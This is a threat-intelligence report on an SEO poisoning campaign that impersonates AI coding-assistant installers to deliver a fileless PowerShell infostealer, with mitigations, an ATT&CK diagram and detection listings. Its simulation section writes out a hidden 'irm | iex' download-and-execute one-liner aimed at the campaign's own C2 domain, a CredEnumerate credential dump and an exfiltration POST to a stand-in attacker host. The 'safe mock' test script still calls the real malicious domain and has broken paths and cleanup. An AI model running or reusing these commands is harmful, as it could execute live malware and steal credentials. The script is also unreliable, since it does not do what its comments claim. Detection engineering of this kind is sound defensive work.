SEO Poisoning Campaign Uses Gemini and Claude Code Lures to Deliver an Infostealer
Follow 
Detection stack
- AIDR
- Alert
- ETL
- Query
Summary
Financially motivated eCrime actors are using SEO poisoning to push fake domains that mimic installers for AI coding assistants. Victims who copy and paste a single PowerShell command from these pages trigger a fileless infostealer that executes fully in memory. The malware steals credentials, session cookies, VPN keys, and sensitive files before exfiltrating the data in encrypted form to a command-and-control server. The campaign is aimed at Windows developer workstations and blends into normal activity by abusing familiar developer tools.
Investigation
EclecticIQ analysts traced the malicious infrastructure to .co.com domains serving PowerShell download strings through irm and iex. The first-stage script launches a hidden PowerShell window using Shell.Application.ShellExecute, then loads additional C# types to gather credentials, system details, and other valuable data. Exfiltration was observed over HTTP and HTTPS to events.msft23.com and events.ms709.com using specific URL paths. Passive DNS analysis linked the operation to a bulletproof hosting provider in the Netherlands and to a wider cluster of typosquatted domains.
Mitigation
Defenders should detect and block the irm | iex execution pattern, hidden PowerShell windows, and suspicious Add-Type usage involving P/Invoke calls. Organizations should enforce PowerShell Constrained Language Mode and use AppLocker or WDAC to prevent script execution from internet-sourced content. Restricting browser clipboard write access and enforcing short-lived OAuth tokens for developer accounts can further reduce exposure. Developers should also be trained to avoid copy-paste commands from untrusted websites.
Response
Security teams should alert on PowerShell processes launched with -WindowStyle Hidden or invoked through Shell.Application.ShellExecute. These events should be correlated with outbound HTTP requests to domains matching *-setup.com or events.*.com, especially when the paths /take, /process, or /validate appear. If this behavior is detected, isolate the affected endpoint, collect PowerShell logs, and perform forensic collection of browser data and credential stores.
"graph TB %% Class Definitions classDef action fill:#99ccff classDef tool fill:#ffdd99 classDef malware fill:#ff9999 classDef process fill:#ccffcc classDef operator fill:#ff9900 %% Nodes u2013 Actions initial_access["<b>Action</b> – <b>T1189 Driveu2011by Compromise</b>: SEOu2011poisoned search results deliver fake Gemini CLI / Claude Code installation page.<br/><b>Subu2011techniques</b> T1204.001 User Execution (malicious link) and T1204.004 User Execution (copyu2011paste PowerShell oneu2011liner)."] class initial_access action execution["<b>Action</b> – <b>T1059.001 PowerShell</b>: Inu2011memory script executed via Shell.Application.ShellExecute, reflective download/execute (irm|iex).<br/><b>Obfuscation</b> T1027 and T1027.016 junk code."] class execution action defense_evasion["<b>Action</b> – <b>T1562.001 Disable Security Tools</b>: Patch amsi.dll, disable ETW, sandbox check for qemuu2011ga.<br/><b>Subu2011technique</b> T1562.006 Disable Event Tracing for Windows."] class defense_evasion action credential_access["<b>Action</b> – <b>T1555.003 Credentials from Web Browsers</b>: Extract browser credentials and cookies.<br/><b>Additional techniques</b> T1555.004 Windows Credential Manager, T1552.001 Credentials in Files, T1552.002 Credentials in Registry, T1539 Steal Web Session Cookie, T1550.004 Web Session Cookie."] class credential_access action discovery["<b>Action</b> – <b>T1057 Process Discovery</b>: Enumerate processes via Restart Manager.<br/><b>Additional techniques</b> T1083 File and Directory Discovery, T1217 Browser Information Discovery, T1497.002 Virtualization / Sandbox Evasion."] class discovery action collection["<b>Action</b> – <b>T1005 Data from Local System</b>: Gather user files (*.txt, *.docx) and cloudu2011synced directories (T1039)."] class collection action command_and_control["<b>Action</b> – <b>T1071.001 Web Protocols</b>: HTTPS beacons to events.msft23.com / events.ms709.com endpoints (/take, /process, /validate).<br/><b>Encryption</b> RSAu2011encrypted task list (T1573) and payload download (T1105 Ingress Tool Transfer)."] class command_and_control action exfiltration["<b>Action</b> – <b>T1041 Exfiltration Over C2 Channel</b>: Encrypted exfiltration of harvested data.<br/><b>Subu2011technique</b> T1020 Automated Exfiltration."] class exfiltration action %% Nodes u2013 Tools / Malware tool_powershell["<b>Tool</b> – <b>Name</b>: PowerShell<br/><b>Description</b>: Windows scripting engine used for inu2011memory execution."] class tool_powershell tool tool_shellexecute["<b>Tool</b> – <b>Name</b>: Shell.Application.ShellExecute<br/><b>Description</b>: Launches hidden windows for script execution."] class tool_shellexecute tool tool_amsi_patch["<b>Tool</b> – <b>Name</b>: AMSI Patch<br/><b>Description</b>: Modifies amsi.dll to bypass script scanning."] class tool_amsi_patch tool tool_etw_disable["<b>Tool</b> – <b>Name</b>: ETW Disable<br/><b>Description</b>: Disables Event Tracing for Windows to avoid detection."] class tool_etw_disable tool tool_credmanager["<b>Tool</b> – <b>Name</b>: CredEnumerate API<br/><b>Description</b>: Retrieves credentials from Windows Credential Manager."] class tool_credmanager tool tool_ssh_reg["<b>Tool</b> – <b>Name</b>: Registry Harvest<br/><b>Description</b>: Reads WinSCP and PuTTY stored passwords from registry keys."] class tool_ssh_reg tool tool_vpn["<b>Tool</b> – <b>Name</b>: VPN Config Collector<br/><b>Description</b>: Gathers VPN configuration files for potential reuse."] class tool_vpn tool tool_wallet["<b>Tool</b> – <b>Name</b>: Crypto Wallet Stealer<br/><b>Description</b>: Extracts wallet files and private keys."] class tool_wallet tool %% Connections u2013 Attack Flow initial_access –>|leads_to| execution execution –>|uses| tool_powershell execution –>|uses| tool_shellexecute execution –>|contains| tool_amsi_patch execution –>|contains| tool_etw_disable execution –>|leads_to| defense_evasion defense_evasion –>|uses| tool_amsi_patch defense_evasion –>|uses| tool_etw_disable defense_evasion –>|leads_to| credential_access credential_access –>|uses| tool_credmanager credential_access –>|uses| tool_ssh_reg credential_access –>|uses| tool_vpn credential_access –>|uses| tool_wallet credential_access –>|leads_to| discovery discovery –>|leads_to| collection collection –>|leads_to| command_and_control command_and_control –>|uses| tool_powershell command_and_control –>|leads_to| exfiltration "
Attack Flow
Detections
Download or Upload via Powershell (via cmdline)
View
Suspicious Powershell Strings (via powershell)
View
Call Suspicious .NET Methods from Powershell (via powershell)
View
IOCs (HashSha256) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer Part 2
View
IOCs (HashSha256) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer Part 1
View
IOCs (SourceIP) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer
View
IOCs (DestinationIP) to detect: SEO poisoning campaign leverages Gemini and Claude Code impersonation to deliver infostealer
View
Detect C2 Beacon Pattern with Specific URI Paths [Windows Network Connection]
View
Fileless PowerShell Infostealer Execution [Windows Powershell]
View
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Rationale: This section details the precise execution of the adversary technique (TTP) designed to trigger the detection rule. The commands and narrative MUST directly reflect the TTPs identified and aim to generate the exact telemetry expected by the detection logic. Abstract or unrelated examples will lead to misdiagnosis.
-
Attack Narrative & Commands:
An attacker compromises a low‑privileged user account and runs a PowerShell one‑liner viacmd.exe. The one‑liner usesirm(Invoke‑RestMethod) to fetch a malicious PowerShell script fromevents.msft23.com, pipes it toiex(Invoke‑Expression) to execute the payload entirely in memory, and hides the PowerShell window to avoid shoulder surfing. The payload subsequently loads a .NET type withAdd‑Typeto perform credential enumeration using theCredEnumerateAPI, exfiltrates the harvested data over HTTPS. All steps are executed without writing files to disk, matching the “file‑less” description.# Step 1 – Hidden PowerShell launch powershell.exe -WindowStyle Hidden -Command "irm https://events.msft23.com/payload.ps1 -UseBasicParsing | iex"The downloaded
payload.ps1(executed in‑memory) contains:# Step 2 – Load .NET type for credential enumeration $type = @" using System; using System.Runtime.InteropServices; public class Cred { [DllImport(""advapi32.dll"", SetLastError=true)] public static extern bool CredEnumerate(string filter, int flag, out int count, out IntPtr pCredentials); } "@ Add-Type $type # Step 3 – Invoke credential dump and exfiltrate $null = [Cred]::CredEnumerate("*",0,[ref]$count,[ref]$ptr) $data = "Collected $count credentials" Invoke-RestMethod -Method Post -Uri https://attacker.c2/exfil -Body $dataThis sequence generates the command‑line fragments that the Sigma rule matches:
powershell.exe -WindowStyle Hiddenirm events.msft23.com | iexAdd-Typeadvapi32.dll!CredEnumerate
-
Regression Test Script: The following script reproduces the exact behavior on a test workstation. Run it from an elevated PowerShell prompt.
# Fileless PowerShell Infostealer Simulation – TC-20260525-A7Z3K # ------------------------------------------------------------ # Step 1 – Execute hidden PowerShell that downloads & runs payload $command = 'powershell.exe -WindowStyle Hidden -Command "irm https://events.msft23.com/payload.ps1 -UseBasicParsing | iex"' Start-Process -FilePath "cmd.exe" -ArgumentList "/c $command" -WindowStyle Hidden # Mock payload.ps1 content (hosted locally for safe testing) $payload = @' $type = @" using System; using System.Runtime.InteropServices; public class Cred { [DllImport("advapi32.dll", SetLastError=true)] public static extern bool CredEnumerate(string filter, int flag, out int count, out IntPtr pCredentials); } "@ Add-Type $type $null = [Cred]::CredEnumerate("*",0,[ref]$count,[ref]$ptr) $data = "Collected $count credentials" # Simulate exfiltration to a harmless endpoint Invoke-RestMethod -Method Post -Uri "https://httpbin.org/post" -Body $data '@ # Write mock payload to temp location for the test (simulating remote hosting) $tempPath = "$env:TEMPpayload.ps1" Set-Content -Path $tempPath -Value $payload -Encoding UTF8 # Serve the payload via a simple local HTTP listener (for demonstration) $listener = [System.Net.HttpListener]::new() $listener.Prefixes.Add("http://+:8080/") $listener.Start() Write-Host "Serving mock payload on http://localhost:8080/payload.ps1" while ($listener.IsListening) { $context = $listener.GetContext() if ($context.Request.Url.AbsolutePath -eq "/payload.ps1") { $bytes = [System.Text.Encoding]::UTF8.GetBytes($payload) $context.Response.ContentLength64 = $bytes.Length $context.Response.OutputStream.Write($bytes,0,$bytes.Length) $context.Response.Close() } } # Note: Stop the listener manually after validation. -
Cleanup Commands: Remove temporary files and stop the HTTP listener.
# Cleanup after simulation Remove-Item -Path "$env:TEMPpayload.ps1" -ErrorAction SilentlyContinue # Stop the local HTTP listener (if still running) Get-Process -Name "powershell" | Where-Object {$_.MainWindowTitle -match "payload"} | Stop-Process -Force